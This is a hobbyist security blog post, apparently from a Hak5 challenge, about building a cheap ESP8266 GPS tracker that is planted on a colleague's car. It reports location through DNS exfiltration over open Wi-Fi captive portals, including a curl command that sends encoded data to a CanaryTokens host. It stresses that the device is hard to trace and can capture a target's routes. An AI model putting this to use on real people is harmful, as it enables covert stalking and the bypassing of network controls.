Stealthy GPS Tracker & Drive-by Telemetry Using Open Wi-Fi

Posted on October 14, 2022 by Alex Lynd ‐ 10 min read

Stealthy GPS Tracker & Drive-by Telemetry Using Open Wi-Fi

Low-Cost Tracking Challenge

In a recent Hak5 episode, I took part in a challenge to track our elusive friend, Irish, and determine the various places he visited throughout the day.

Since low-cost hardware & disposable signals intelligence is a core part of my projects, I challenged myself to create a tracker in the smallest practical footprint, and designed a $10 device that uses only Wi-Fi to provide location updates once planted on Irish’s car.

Using DNS Exfiltration, CanaryTokens, an an ESP8266 with specialized low-power hardware, I created a motion activated tracker that could transmit intermittent location updates, by connecting to open Wi-Fi networks that Irish would drive past.

In this post, I’ll talk about the design process of DNS DriveBy: a $10 proof-of-concept & wardriving technique that uses open Wi-Fi networks to provide location data, Wi-Fi reconnaissance, and other telemetry.

Resources

Mapping Wi-Fi Devices with Wardriving

Wardriving is my favorite lazy reconnaissance technique, since I can aimlessly skate around and create an interactive map of vulnerable networks, IOT products, and various other devices in our wireless landscape.

I’ve toyed with the idea of creating “disposable wardriving payloads” that I can slap on (my) car or a neighborhood cat (or anything that moves really), so I could get even lazier with collecting Wi-Fi intelligence - and created a $10 wardriving rig using minimal components, making it accessible for anyone to replicate.

I’ve used it to demonstrate how hackers can phish your company with a mail parcel, and even strapped it to a drone for warflying - but one obvious limitation lies in its inability to provide real-time telemetry for tracking applications, since it only uses a Wi-Fi radio.

$10 ESP8266 GPS Tracker

While I could connect a SIM card module, this adds additional hardware and a cost barrier to my design - and also makes it more easily traceable if discovered.

So I wondered, would it be possible to use un-authenticated Wi-Fi from coffee shops or setup networks that it drives past to upload wardriving data & GPS coordinates intermittently?

Bypass Captive Wi-Fi Portals with DNS

The answer is yes, but obviously it wasn’t as simple that - I found that most of the open networks I encountered had a captive portal that requires you to input an email address or some other nonsense before you can actually connect to the web.

However, my friend Kody suggested I look into DNS requests to bypass the captive portal using a well-known technique called DNS Exfiltration, which allows hackers to sneak sensitive information out of a network by hiding data “inside” of a domain name instead of sending a typical web request.

This works by making a DNS request to a domain name like alexlynd.com, but prepending a subdomain like <password_here>.alexlynd.com - so that way I can retrieve the password (or other sensitive information) on my server, by looking at the nameserver logs.

While this is typically used to bypass poorly-configured firewalls for data exfiltration, I can also take advantage of this technique to sneak our wardriving gps data into the network as well!

&ldquo;DNS Exfiltration&rdquo;

Thanks to poor ingress filtering, I discovered that most of my nearby open networks allowed me to resolve DNS requests without “fully connecting” through the captive portal!

CanaryTokens as a GPS Database

Hosting my own web server & infrastructure for DNS Exfiltration would be a pain in the ass, but luckily CanaryTokens, an awesome free honeypot solution, offers a DNS Token service that makes it extremely simple to exfiltrate our data to an online dashboard!

To try this service out, I connected to my local coffee shop Wi-Fi from my laptop without entering my info into the captive portal, and used my phone to generate a DNS token, which gave me a unique url in the format <dns-token-here>.canarytokens.org.

In order to exfiltrate data to this token, CanaryTokens specifices we prepend a random 2 digit number with G, and a base32 encoded subdomain - so I used an online converter to translate meow123 to base 32: NVSW65ZRGIZQ and made a request to the following url with curl:

curl NVSW65ZRGIZQ.G69.<dns-token-here>.canarytokens.org

DNS request created by cURL to CanaryTokens

It worked! The last step was to create the hardware to log & convert GPS coordinates into base32 encoded strings, and automatically push that data through nearby open Wi-Fi networks.

ESP8266 Wardriving Rig for $10

I didn’t have a lot of time to iterate before deploying this project on Irish, so I tried my best to create a rugged prototype in the smallest possible form-factor using on-hand components. Here’s how it was done.

DNS DriveBy tracker being placed on Irish&rsquo;s car

Breadboarding

The ESP8266 is my favorite low-cost Wi-Fi microcontroller for its attack & reconnaissance capabilities, and I chose the minimal ESP-01 form-factor to keep my tracker footprint as small as possible.

Paired with a NEO-6M GPS module, I started by creating a breadboard prototype to test how many coordinates could be logged to the ESP8266’s internal memory.

DNS DriveBy breadboard prototype with ESP8266 and NEO-6M GPS

Essential ComponentsNotesCost
Wi-Fi Microcontroller (ESP8266)I use an ESP-01 module for this prototype, but any other ESP8266 will work. You will need a programmer for it$1
GPS Module (NEO-6M)Cheap, easy to source UART GPS$3

Memory Management

I found that storing the GPS coordinates quickly ate up heap space, causing overflows & crashes since the ESP8266 only has ~40KB of internal RAM - meaning I could only store around 625 GPS coordinate pairs (as floats).

To mitigate this, I implemented a queue system that pushes coordinates to the internal 1MB Flash Memory with SPIFFS - which also allows me to retain data in case of a power loss or reset.

DNS DriveBy Internal Database

To optimize the amount of memory available and reduce flash wear, I set the GPS to poll coordinates every 15 seconds, and only keep 100 coordinates in RAM as 34 character base32 encoded char arrays. This allows me store around 15,600 coordinate pairs!

Low-Power Hardware

To keep the board powered for long enough to provide intel on Irish’s whereabouts, implementing low-power hardware was necessary to conserve battery while his car was sitting idle. Luckily, the ESP8266 comes with a low-power mode that brings power consumption down to around 20μA, which can be invoked with the following function:

ESP.deepSleep(0);

Usually, we “wake” the board up in software by specifying a delay, but since I wanted to trigger a reset when motion is detected from a shake sensor, this was tricky since the onboard I/O pins are disabled in deep sleep mode.

Triggering the reset when Irish’s car starts up was as simple as adding a shake sensor between reset and ground - but in order to prevent an accidental reset while the device is powered up, I had to use an NPN transistor and a NOT gate to create a rudimentary normally-closed switch, which electronically “disconnects” the shake sensor while the tracker is powered up & moving.

DNS DriveBy reset circuitry and schematic

Reset CircuitryNotesQtyCost
Shake SensorWakes up ESP8266 from Deep Sleep when motion is detected1
NPN TransistorUsed to control reset circuit, use 2N3904 or similar3
10K Ω ResistorSomething about circuits3

Final Prototype

To piece it all together, I soldered all my components on a perfboard, and implemented a cheap BMS using a voltage regulator & an 400mAh LiPo battery that gives me around 4.5 hours of continuous reconnaissance (at a current draw ~90mAh).

DNS DriveBy perfboard prototype

Battery ManagementNotesQtyCost
3.7V LiPo BatteryI use a 400mAh battery with a max size 16x35x8mm to fit in the enclosure1$2.5
Slide Switch (SPDT)Turn the tracker on/off1
PerfboardHell you could just connect everything with 22AWG wire1
Terminal BlockScrew-down connector for the LiPo battery1
ESP-01 Female Pin HeadersESP-01 standoff to give more space for mounting components1

To protect the electronics & provide a large enough surface to adhere to Irish’s car, I used FreeCAD to whip up a minimal 2-part enclosure that uses heat inserts & screws cause I thought they were cool.

Assembled DNS DriveBy prototype with ESP8266 and NEO-6M GPS

Case AssemblyNotesQtyCost
M2.5 x 6mm Threaded InsertsYou don’t need threaded inserts but they’re nice4
M2.5 x 6mm Screws4

Tracking Experiment Results

To test out the prototype, I enabled an open Wi-Fi network on my phone and drove around to see if I could get a consistent log of GPS coordinates along my route. Since it’s designed to cache data while no open networks are available, I turned off the hotspot at random intervals to see if I could still receive those coordinates.

I initially faced some issues with the watchdog timer triggering while it attempted to scan for open networks, and heap overflows while multitasking between GPS logging & running Wi-Fi scans - but eventually got a pretty robust prototype working!

GPS Data Exfiltrated to CanaryTokens Dashboard

The next day, Kody, Michael, and I deployed our tracking systems on Irish, each using a different approach and reconnaissance style:

  • Michael used off-the shelf trackers and consumer products such as a Tile tracker
  • Kody used out-of-the-box hacker hardware and a tricky QR code phishing attack to track Irish using Wi-Fi probes from his phone
  • I used my skills as a hardware developer to create a low-cost, virtually untracable implant to give me passive location updates

At the end of the day, I checked my CanaryTokens dashboard and had a couple hundred hits from Irish’s excursion around East LA!

Map of Irish&rsquo;s Route around Glendale with GPS Points

In order to turn this data into something useful, I downloaded the CanaryTokens log as a csv file, used Python to parse the GPS coordinates, and used Google MyMaps to visualize the data.

Since the tracker was planted on Irish’s car, this map only provides insight to the general areas that he visited - but I was still able to see that he stopped at Forest Lawn, and took a visit to the Glendale Galleria!

Implications & Future Improvements

Limitations

While DNS DriveBy doesn’t provide real-time GPS updates like an off-the-shelf solution would, my prototype was able to gather equally insightful data on the places Irish visited, in a much cheaper and less traceable footprint - since a SIM card or GPS Tracker UID could potentially be used to determine who planted it.

The trade-off of course is relying on the presence of open Wi-Fi networks to provide telemetry, and the infrequent, intermittent updates - but given that the target (or wardriving neighborhood cat) is traversing somewhat urban areas, the density of open Wi-Fi networks should be modest. If they’re frequenting certain locations, it’s also possible to hard-code known credentials for specific home/work networks as well!

DNS DriveBy tracker planted in car bumper

Improvements

To make the design more robust and easier for beginners to assemble, I started designing a PCB kit that includes all the project components, which can also be used try out some of my other low-cost Signals Intelligence projects!

Using the D1 Mini ESP8266 form-factor, this design allows for easy plug-and-play expansion with various D1 hardware add-ons, and also has a larger 4MB flash chip.

DNS DriveBy PCB Render

Conclusion & Future Ideas

After successfully plotting Irish’s full trip with precise datetime and GPS data through intermittent updates, I successfully demonstrated the feasibility of fortuitous reconnaissance over open Wi-Fi networks! Using tricky techniques like DNS exfiltration, I was able to bypass captive portals, and also used a $1 Wi-Fi microcontroller to create a low-profile tracker that provides GPS telemetry to an online dashboard.

While I didn’t get to explore the original “lazy wardriving” concept in this demo, DNS DriveBy lays the groundwork for a cheap, easy-to-replicate reconnaissance platform & exfiltration technique that I’ll definitely embed in my future projects.

Through assisted GPS, I hope to push how far I can take this tracker in my next iteration, by using only a Wi-Fi radio (no GPS) and online database like WiGLE to reverse the tracker’s location based off known Wi-Fi networks.

If you want to follow updates on this project and more, check out my Twitter and consider donating to support my work!

This project wouldn’t be possible without my sponsor PCBWay! Check out their website for PCB fabrication and other prototyping solutions.